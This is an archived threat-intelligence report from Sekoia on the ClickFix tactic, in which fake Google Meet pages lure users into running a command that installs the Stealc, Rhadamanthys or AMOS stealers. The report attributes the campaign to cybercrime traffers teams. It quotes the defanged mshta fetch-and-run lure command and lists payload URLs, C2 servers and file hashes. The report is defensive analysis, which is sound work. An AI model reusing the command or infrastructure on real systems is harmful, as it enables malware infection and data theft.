{
	"id": "4fb6314d-fffc-422b-abb2-670988b05109",
	"created_at": "2026-04-06T00:18:33.858313Z",
	"updated_at": "2026-04-10T03:33:20.625064Z",
	"deleted_at": null,
	"sha1_hash": "55a007707dd3ffad8290f8344aa09e0bf629d177",
	"title": "ClickFix tactic: The Phantom Meet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2640776,
	"plain_text": "ClickFix tactic: The Phantom Meet\r\nBy Quentin Bourgue and Sekoia TDR\r\nPublished: 2024-10-17 · Archived: 2026-04-05 21:57:49 UTC\r\nTable of contents\r\nContext\r\nClickFix in the wild\r\nChronological overview of ClickFix campaigns\r\nVictimology of ClickFix clusters\r\nInvestigation of ClickFix clusters\r\nFake Google Meet pages and technical issues\r\nWindows users targeted with Stealc and Rhadamanthys\r\nMacOS users targeted by AMOS Stealer\r\nTraffers teams operating this ClickFix cluster\r\nConclusion\r\nCluster ClickFix IoCs \u0026 Technical details\r\nFake Google Meet pages and associated infection chain\r\nAdditional clusters allegedly associated with the same traffers teams\r\nExternal references\r\nContext\r\nIn May 2024, a new social engineering tactic called ClickFix emerged, featuring a ClearFake cluster that the\r\nSekoia Threat Detection \u0026 Research (TDR) team closely monitored and analysed in a private report entitled\r\nFLINT 2024-027 – New widespread ClearFake variant abuses PowerShell and clipboard. This tactic involves\r\ndisplaying fake error messages in web browsers to deceive users into copying and executing malicious\r\nPowerShell code, ultimately infecting their systems.\r\nProofpoint researchers, who named this tactic ClickFix, reported [1] that the initial access broker TA571 has leveraged it\r\nin email phishing campaigns since March 2024. These campaigns primarily used HTML files disguised as Word\r\ndocuments, displaying a fake error window that prompts users to install malware such as Matanbuchus, DarkGate,\r\nor NetSupport RAT via a PowerShell script.\r\nIn recent months, multiple malware distribution campaigns have leveraged the ClickFix lure to spread Windows\r\nand macOS infostealers, botnets, and remote access tools. This is in line with the growing, ongoing trend of\r\ndistributing malware through the drive-by download technique. 
Sekoia analysts assess that several intrusion sets\r\nhave recently adopted this tactic, presumably to evade antivirus software scanning and browser security features,\r\naiming to improve attackers’ infection rates. \r\nhttps://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\r\nPage 1 of 18\n\nIn this blog post, we provide a chronological overview of the observed ClickFix campaigns. We further share\r\ntechnical details about a ClickFix cluster that uses fake Google Meet video conference pages to distribute\r\ninfostealers, targeting both Windows and macOS systems. Sekoia analysts successfully associated this cluster\r\nimpersonating Google Meet with two cybercrime groups: “Slavic Nation Empire (SNE)” and “Scamquerteo”.\r\nThese groups are sub-teams of the cryptocurrency scam teams “Marko Polo” and “CryptoLove”, respectively.\r\nClickFix in the wild\r\nChronological overview of ClickFix campaigns\r\nSince June 2024, various open source reports and Sekoia investigations have revealed malware distribution\r\ncampaigns using the emerging ClickFix tactic. The following figure provides a chronological overview of these\r\ncampaigns. It highlights the malware families involved and the distribution techniques used, which include\r\nphishing emails, compromised websites, and distribution infrastructures.\r\nFigure 1. Overview of malware distribution campaigns using the ClickFix tactic\r\nHere are some examples of malicious websites that impersonate Google Chrome, Facebook, PDFSimpli, and\r\nreCAPTCHA, using the ClickFix social engineering tactic.\r\nFigure 2. 
Examples of malicious websites impersonating Google Chrome, Facebook, PDFSimpli,\r\nand reCAPTCHA, using the ClickFix tactic\r\nVictimology of ClickFix clusters\r\nWhile many of these campaigns reportedly aim to broadly target multiple sectors – using websites compromised\r\nby ClearFake or through extensive phishing efforts – some are designed to target specific verticals.\r\nFor instance, Proofpoint identified [2] a ClickFix cluster targeting transport and logistics companies in North\r\nAmerica from at least May to August 2024. This campaign uses websites that impersonate transport and fleet\r\noperations management software.\r\nAdditionally, the GitHub issues campaign mainly targeted developers to spread Lumma Stealer by falsely\r\nreporting security vulnerabilities, thereby impacting thousands of public code repositories and exploiting\r\ndevelopers’ trust in GitHub notifications. The goal of this large-scale operation was likely to opportunistically\r\ngather a significant amount of sensitive developer data, which can be used for more targeted attacks in the future.\r\nRecent campaigns uncovered by Sekoia analysts appear to continuously target both businesses and individuals,\r\nusing opportunistic lures such as fake Google Meet pages and Facebook groups.\r\nInvestigation of ClickFix clusters\r\nThe following section provides a detailed analysis of one of the clusters discovered by Sekoia analysts.\r\nFake Google Meet pages and technical issues\r\nBy pivoting on the text elements in ClickFix messages displayed to users, such as the phrase “Press the key\r\ncombination” or “CTRL+V”, we discovered several websites masquerading as the homepage of a Google Meet\r\nvideo conference. The sites displayed pop-up windows falsely indicating problems with the microphone and\r\nheadset, as shown in the figure below.\r\nFigure 3. 
Fake homepage of a Google Meet video conference displaying a pop-up faking technical\r\nissues (ClickFix)\r\nWe identified the following domain names and IP address that we attribute to this cluster with high confidence:\r\nmeet[.]google[.]us-join[.]com\r\nmeet[.]googie[.]com-join[.]us\r\nmeet[.]google[.]com-join[.]us\r\nmeet[.]google[.]web-join[.]com\r\nmeet[.]google[.]webjoining[.]com\r\nmeet[.]google[.]cdm-join[.]us\r\nmeet[.]google[.]us07host[.]com\r\ngoogiedrivers[.]com\r\n77.221.157[.]170\r\nThe phishing URLs imitate legitimate ones with the same pattern for the meeting identifier, e.g.:\r\nhxxps://meet[.]google[.]com-join[.]us/wmq-qcdn-orj\r\nhxxps://meet[.]google[.]us-join[.]com/ywk-batf-sfh\r\nhxxps://meet[.]google[.]us07host[.]com/coc-btru-ays\r\nhxxps://meet[.]google[.]webjoining[.]com/exw-jfaj-hpa\r\nWindows users targeted with Stealc and Rhadamanthys\r\nFor Windows users, clicking on the “Try Fix” button results in copying the following command into the clipboard:\r\nmshta hxxps://googIedrivers[.]com/fix-error\r\nThe fix-error file (SHA256: 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138) is an\r\nHTML file containing an HTML Application (HTA) which itself contains an obfuscated VBScript. Using a Python\r\nscript [3], we deobfuscated it and obtained the following VBScript.\r\nFigure 4. Deobfuscated VBS script distributed by the cluster of fake Google meetings\r\nUpon execution, the VBS script performs the following actions:\r\n1. It terminates its parent process (mshta.exe).\r\n2. It downloads two executables (stealc.exe and ram.exe) using bitsadmin. After a two-second delay, it\r\nnotifies the C2 server (webapizmland[.]com) about the success or failure of running the executables.\r\n3. 
It retrieves the victim’s public IP address using the service api.ipify[.]org and sends it to the C2 server\r\nalong with the execution status.\r\nThe two executables stealc.exe (SHA256:\r\na834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c) and ram.exe (SHA256:\r\n2853a61188b4446be57543858adcc704e8534326d4d84ac44a60743b1a44cbfe) are the Stealc and Rhadamanthys\r\npayloads respectively, both protected by the HijackLoader crypter.\r\nIn this campaign, the Stealc C2 server is “hxxp://95.182.97[.]58/84b7b6f977dd1c65.php” and the Rhadamanthys\r\nC2 server is “hxxp://91.103.140[.]200:9078/3936a074a2f65761a5eb8/6fmfpmi7.fwf4p”. Both IP addresses were\r\nalready known to our CTI database following the Sekoia.io C2 Trackers monitoring routine, as we proactively\r\ntrack the C2 infrastructure of these two infostealer families sold as Malware-as-a-Service.\r\nNotably, the name of the Stealc botnet “sneprivate24” suggests that the traffer [4] group “Slavic Nation Empire\r\n(SNE)” was behind this campaign. Further details about this association can be found in the section “Traffers\r\nteams operating this ClickFix cluster”.\r\nMacOS users targeted by AMOS Stealer\r\nFor macOS users, clicking on the “Try Fix” button results in downloading the file Launcher_v1.94.dmg (SHA256:\r\n94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5), using the following HTTP requests:\r\n1. A GET request to hxxps://carolinejuskus[.]com/kusaka.php?call=launcher, where the server responds with\r\na second URL in the HTTP header Location.\r\n2. 
A GET request to\r\nhxxps://carolinejuskus[.]com/f9dfbcf6a999/7cc2f5dc3c76/load.51f8527e20dcb05ffd8586b853937a8a.php?\r\ncall=launcher, which returns the malicious payload.\r\nWe identified the payload Launcher_v1.94.dmg (SHA256:\r\n94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5) as AMOS Stealer, which\r\ncommunicates with its C2 server at “hxxp://85.209.11[.]155/joinsystem”.\r\nSekoia actively tracks this infrastructure, characterised by the /kusaka.php endpoint. Since at least May 2024, this\r\nendpoint has been used in campaigns redirecting users from malicious websites to download the AMOS Stealer. It is\r\nlikely used to protect the payload from unwanted traffic, such as downloads by bots or scans by security products.\r\nWe identified twenty domain names associated with this macOS malware distribution infrastructure; the full list\r\nis available in the Sekoia.io IoC repository on GitHub.\r\nGiven the variety of initial malicious websites redirecting to this infrastructure, we assess with high confidence\r\nthat it is shared among multiple threat actors. They collaborate within a centralised traffers team to share certain\r\nresources, including this infrastructure and the AMOS Stealer, which is also sold as Malware-as-a-Service.\r\nTraffers teams operating this ClickFix cluster\r\nSlavic Nation Empire (SNE): a sub-group of Marko Polo\r\nThe attacker’s server hosts interesting JavaScript code at hxxp://77.221.157[.]170:3004/server.js [5], which is\r\nbackend code related to this distribution infrastructure. 
In brief, this JavaScript connects to a MongoDB database\r\nto retrieve workers’ information and sends statistics to two Telegram bots when users visit the malicious\r\nGoogle Meet websites and successfully download the payload. We would like to thank the cybersecurity\r\nresearcher Karol Paciorek from the CSIRT KNF team for sharing this discovery with us [6].\r\nThe following is an excerpt of the JavaScript code that includes the message sent to the two Telegram bots.\r\nFigure 5. Excerpt of attacker’s backend code exfiltrating data to Telegram bots, used by the\r\nClickFix cluster “fake Google meetings”\r\nThe attacker uses this backend to track compromises and visits for this ClickFix cluster.\r\nBy extracting the chat logs of the Telegram bots “#SNE | GMEET OTSTUK” using the Telegram API, we\r\ndiscovered a discussion between sparkhash, the alleged developer of this ClickFix cluster, and the traffer Alexmen.\r\nOur investigation revealed that both threat actors are members of the traffers team “Slavic Nation Empire (SNE)”,\r\nwhich is a sub-team of the cryptocurrency scam team “Marko Polo”.\r\nFigure 6. 
Extract of a Telegram bot discussion between the alleged operator and a possible affiliate\r\nof the cluster “fake Google Meet pages”\r\nCybercriminals frequently use Telegram bots to monitor their activities, especially when this involves working in\r\na team and collaborating with affiliates (traffers/workers).\r\nBased on our analysis of this cluster’s activities and the messages shared between the threat actors operating and\r\nusing it, Sekoia analysts advance the following hypothesis:\r\nThe threat actor sparkhash deployed the GMeet cluster for the benefit of the traffers team “Slavic\r\nNation Empire (SNE)” in charge of generating traffic to this cluster.\r\nThis team of traffers could be administered by the threat actor Alexmen, who oversees the distribution\r\nclusters’ activities and possibly manages infostealer licences, relying on external services.\r\nThe traffers, also known as affiliates or workers, spread the malicious URLs to potential victims,\r\nredirecting them to this cluster. For example, the cybercriminal going by the handle web3huntereth may\r\nhave infected a victim, or himself as part of a test, in Poland, as indicated by the download statistics from\r\nthe Telegram bot.\r\nTDR confidently associates this cluster impersonating Google Meet with the traffers team “Slavic Nation\r\nEmpire (SNE)”, also known as “Slavice Nation Land”. This team provides its members with a comprehensive kit for\r\nsophisticated scams targeting users of cryptocurrency assets, Web3 applications, decentralised finance, and NFT.\r\nThe kit includes landing pages impersonating software and video conferencing webpages, along with infostealers,\r\ndrainers, and automation tools to coordinate attacks.\r\nThe traffers team “Slavic Nation Empire (SNE)” is a sub-group of the cryptocurrency scam team “Marko Polo”\r\nand part of the Russian-speaking cybercrime ecosystem. 
We would like to thank the cybersecurity researcher\r\ng0njxa for sharing some valuable hints on these groups with us. Additionally, Recorded Future researchers have\r\npublished two reports detailing Marko Polo campaigns [7][8].\r\nScamquerteo Team: a sub-group of CryptoLove\r\nMoreover, we discovered that the traffers team “Scamquerteo” also used this ClickFix cluster impersonating\r\nGoogle Meet, specifically using the FQDN “meet[.]google[.]webjoining[.]com” to spread malware. The traffers\r\nteam “Scamquerteo Team” is a sub-group of the cryptocurrency scam team “CryptoLove” and part of the\r\nRussian-speaking cybercrime ecosystem.\r\nDuring our investigation, we were able to interact with their Telegram bot, which manages the traffers’\r\nactivities for the fake Google Meet cluster, as shown in the following figure.\r\nFigure 7. Interaction with Scamquerteo’s Telegram bot to generate a fake Google Meet page\r\nBoth traffers teams, “Slavic Nation Empire (SNE)” and “Scamquerteo”, use the same ClickFix template that\r\nimpersonates Google Meet. This discovery suggests that these teams share materials, also known as “landing\r\nproject”, as well as infrastructure.\r\nSekoia analysts assess with medium confidence that both teams use the same cybercrime service to supply\r\nthem with this fake Google Meet cluster, which remains unknown at the time of writing. Additionally, it is likely\r\nthat a third party manages their infrastructure or registers their domain names.\r\nConclusion\r\nClickFix is an emerging social engineering tactic first observed in 2024. 
As of September 2024, several\r\nintrusion sets have already adopted it to widely distribute malware through email phishing campaigns, compromised\r\nwebsites, and distribution infrastructures.\r\nThe ClickFix tactic deceives users into downloading and running malware on their machines without\r\ninvolving a web browser for the download or requiring manual file execution. It makes it possible to bypass web\r\nbrowser security features, such as Google Safe Browsing, and to appear less suspicious to unsuspecting corporate\r\nand individual users.\r\nThe ClickFix cluster analysed in this blog post employs a decoy that could be particularly devastating in\r\ncampaigns targeting organisations that use Google Workspace, especially Google Meet. The investigation into\r\nthe traffers team distributing this cluster suggests that it primarily targets cryptocurrency assets, Web3\r\napplications, decentralised finance, and NFT users. 
However, we believe that similar social engineering\r\ntechniques could be employed in other malware distribution campaigns.\r\nCluster ClickFix IoCs \u0026 Technical details\r\nThe list of IoCs is available on the Sekoia.io GitHub repository.\r\nFake Google Meet pages and associated infection chain\r\nPhishing domains and URLs impersonating Google Meet: see the section “Fake Google Meet pages and technical issues” above.\r\nInfection chains:\r\ngoogiedrivers[.]com (payload download)\r\nus18web-zoom[.]us (payload download)\r\nwebapizmland[.]com (fingerprint data exfiltration)\r\ncarolinejuskus[.]com (macOS payload download)\r\n95.182.97[.]58 (Stealc C2)\r\n91.103.140[.]200 (Rhadamanthys C2)\r\n85.209.11[.]155 (AMOS Stealer C2)\r\nhxxps://googIedrivers[.]com/fix-error (payload download)\r\nhxxps://us18web-zoom[.]us/stealc.exe (payload download)\r\nhxxps://us18web-zoom[.]us/ram.exe (payload download)\r\nhxxps://webapizmland[.]com/api/cmdruned (payload download)\r\nhxxp://95.182.97[.]58/84b7b6f977dd1c65.php (Stealc C2)\r\nhxxp://91.103.140[.]200:9078/3936a074a2f65761a5eb8/6fmfpmi7.fwf4p (Rhadamanthys C2)\r\nhxxps://carolinejuskus[.]com/kusaka.php?call=launcher (macOS payload download)\r\nhxxp://85.209.11[.]155/joinsystem (AMOS Stealer C2)\r\n92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138 (malicious HTML payload)\r\na834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c (Stealc 
payload)\r\n2853a61188b4446be57543858adcc704e8534326d4d84ac44a60743b1a44cbfe (Rhadamanthys payload)\r\n94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5 (AMOS Stealer payload)\r\nAMOS Stealer distribution infrastructure: twenty domain names, listed in full in the Sekoia.io IoC repository on GitHub.\r\nAdditional clusters allegedly associated with the same traffers teams\r\nSekoia.io TDR uncovered a large-scale malware distribution infrastructure allegedly associated with several\r\ntraffers teams that use the fake Google Meet cluster. This infrastructure was unveiled based on passive DNS,\r\nWhois lookups, and HTML similarities, such as title, text, favicon and resources.\r\nThis infrastructure includes webpages impersonating platforms like Zoom, video games, office software, and fake\r\nWeb3 applications, which spread Stealc, Rhadamanthys, and AMOS Stealer to Web3 gamers. The following clusters\r\nwere identified (their domain names are listed in the Sekoia.io IoC repository on GitHub):\r\nZoom cluster\r\nPDF reader cluster (office software)\r\nLunacy / Calipso (fake video game)\r\nULTIMATE / BATTLEFORGE (fake video game)\r\nRAGON GAME (fake video game)\r\nWeb3 web browser\r\nCozy World Metaverse\r\nNGT Studio\r\nNortex Web3 Messaging App\r\nExternal references\r\n1. https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\n2. https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering\r\n3. https://gist.github.com/qbourgue/e7959e4089c1993045e01cb9c3cbc6a5\r\n4. https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem/\r\n5. https://urlscan.io/result/d77b2603-e586-403b-ae49-90523269510a/\r\n6. https://x.com/karol_paciorek/status/1838878695269728455\r\n7. https://www.recordedfuture.com/research/the-travels-of-markopolo-self-proclaimed-meeting-software-vortax-spreads-infostealers\r\n8. 
https://www.recordedfuture.com/research/marko-polo-navigates-uncharted-waters-with-infostealer-empire\r\nSource: https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/"
	],
	"report_names": [
		"clickfix-tactic-the-phantom-meet"
	],
	"threat_actors": [
		{
			"id": "4fad0171-9089-4bc8-83c5-727ee455f6fe",
			"created_at": "2024-06-25T02:00:05.035985Z",
			"updated_at": "2026-04-10T02:00:03.657798Z",
			"deleted_at": null,
			"main_name": "Markopolo",
			"aliases": [],
			"source_name": "MISPGALAXY:Markopolo",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d9b39228-0d9d-4c1e-8e39-2de986120060",
			"created_at": "2023-01-06T13:46:39.293127Z",
			"updated_at": "2026-04-10T02:00:03.277123Z",
			"deleted_at": null,
			"main_name": "BelialDemon",
			"aliases": [
				"Matanbuchus"
			],
			"source_name": "MISPGALAXY:BelialDemon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7183913d-9a43-4362-96e1-9af522b6ab84",
			"created_at": "2024-06-19T02:00:04.377344Z",
			"updated_at": "2026-04-10T02:00:03.653777Z",
			"deleted_at": null,
			"main_name": "TA571",
			"aliases": [],
			"source_name": "MISPGALAXY:TA571",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434713,
	"ts_updated_at": 1775792000,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/55a007707dd3ffad8290f8344aa09e0bf629d177.pdf",
		"text": "https://archive.orkl.eu/55a007707dd3ffad8290f8344aa09e0bf629d177.txt",
		"img": "https://archive.orkl.eu/55a007707dd3ffad8290f8344aa09e0bf629d177.jpg"
	}
}